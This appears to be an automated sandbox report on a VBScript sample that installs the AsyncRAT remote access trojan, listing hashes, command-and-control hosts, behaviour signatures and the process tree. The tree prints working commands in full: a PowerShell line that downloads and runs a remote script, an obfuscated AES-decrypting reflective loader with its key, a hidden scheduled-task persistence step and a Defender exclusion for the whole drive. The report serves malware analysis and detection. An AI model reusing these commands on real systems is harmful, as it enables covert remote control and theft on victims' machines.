Analysis

  • max time kernel
    292s
  • max time network
    300s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win11-20241007-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    09-12-2024 20:47

General

  • Target

    9765_output.vbs

  • Size

    69KB

  • MD5

    f0a90fbc29a64f4274b014755f88c990

  • SHA1

    e8f7053bea6eab342edf9d80c15835b6fb6d9844

  • SHA256

    df37f986e4342d26e408aa370058ba21d218aaac358ba940bde7ac1f035549d7

  • SHA512

    fc42c09434d77f5688d23eab7700440196d07e517e3940d3b47484f2c4de214301063b9537febf1f3396fcf033cead22b4aecd68f18acc7c6f06f8f06ffc3c77

  • SSDEEP

    768:Oyq+h3xb1DhEhMXSHLGjhlZrkoq22Ub9aLILRNho4rBT9qDCJfJw/urPFpjw4g:lhBJihvKjhbQoDNbUILRUcE4wWrtp0D

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

jt8iyre.localto.net:55644

jt8iyre.localto.net:2101

Mutex

WzRdrlEJS302

Attributes
  • delay

    3

  • install

    false

  • install_file

    dwmm.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 29 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9765_output.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:960
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4888
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krqlhq3u\krqlhq3u.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5004
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5F4.tmp" "c:\Users\Admin\AppData\Local\Temp\krqlhq3u\CSCD352445E4214B5DAD6592B2C95F558.TMP"
            5⤵
              PID:4856
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\1fvz2th3.inf
            4⤵
              PID:4752
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:848
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8l4w457KDIom6rIqFxIss0f2qXmFneRo91Mq9t/nGJg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QryA4ACPDNVab4+J6hK+gg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zmSQy=New-Object System.IO.MemoryStream(,$param_var); $CTpIN=New-Object System.IO.MemoryStream; $uhoSQ=New-Object System.IO.Compression.GZipStream($zmSQy, [IO.Compression.CompressionMode]::Decompress); $uhoSQ.CopyTo($CTpIN); $uhoSQ.Dispose(); $zmSQy.Dispose(); $CTpIN.Dispose(); $CTpIN.ToArray();}function execute_function($param_var,$param2_var){ $UlPQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xvztn=$UlPQj.EntryPoint; $xvztn.Invoke($null, $param2_var);}$xRCke = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $xRCke;$gqghP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($xRCke).Split([Environment]::NewLine);foreach ($TgnJP in $gqghP) { if ($TgnJP.StartsWith(':: ')) { $uPmQq=$TgnJP.Substring(20); break; }}$payloads_var=[string[]]$uPmQq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var 
(,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2508
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_166_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_166.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4824
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_166.vbs"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2128
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_166.bat" "
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1380
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8l4w457KDIom6rIqFxIss0f2qXmFneRo91Mq9t/nGJg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QryA4ACPDNVab4+J6hK+gg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zmSQy=New-Object System.IO.MemoryStream(,$param_var); $CTpIN=New-Object System.IO.MemoryStream; $uhoSQ=New-Object System.IO.Compression.GZipStream($zmSQy, [IO.Compression.CompressionMode]::Decompress); $uhoSQ.CopyTo($CTpIN); $uhoSQ.Dispose(); $zmSQy.Dispose(); $CTpIN.Dispose(); $CTpIN.ToArray();}function execute_function($param_var,$param2_var){ $UlPQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xvztn=$UlPQj.EntryPoint; $xvztn.Invoke($null, $param2_var);}$xRCke = 'C:\Users\Admin\AppData\Roaming\startup_str_166.bat';$host.UI.RawUI.WindowTitle = $xRCke;$gqghP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($xRCke).Split([Environment]::NewLine);foreach ($TgnJP in $gqghP) { if ($TgnJP.StartsWith(':: ')) { $uPmQq=$TgnJP.Substring(20); break; }}$payloads_var=[string[]]$uPmQq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function 
$payload2_var (,[string[]] (''));
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4624
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2388

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        2KB

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        18KB

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Temp\RESA5F4.tmp

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zo0djk10.45x.ps1

        Filesize

        60B

      • C:\Users\Admin\AppData\Local\Temp\c.bat

        Filesize

        59KB

      • C:\Users\Admin\AppData\Local\Temp\krqlhq3u\krqlhq3u.dll

        Filesize

        4KB

      • C:\Users\Admin\AppData\Roaming\startup_str_166.vbs

        Filesize

        115B

      • C:\windows\temp\1fvz2th3.inf

        Filesize

        683B

      • \??\c:\Users\Admin\AppData\Local\Temp\krqlhq3u\CSCD352445E4214B5DAD6592B2C95F558.TMP

        Filesize

        652B

      • \??\c:\Users\Admin\AppData\Local\Temp\krqlhq3u\krqlhq3u.0.cs

        Filesize

        2KB

      • \??\c:\Users\Admin\AppData\Local\Temp\krqlhq3u\krqlhq3u.cmdline

        Filesize

        369B
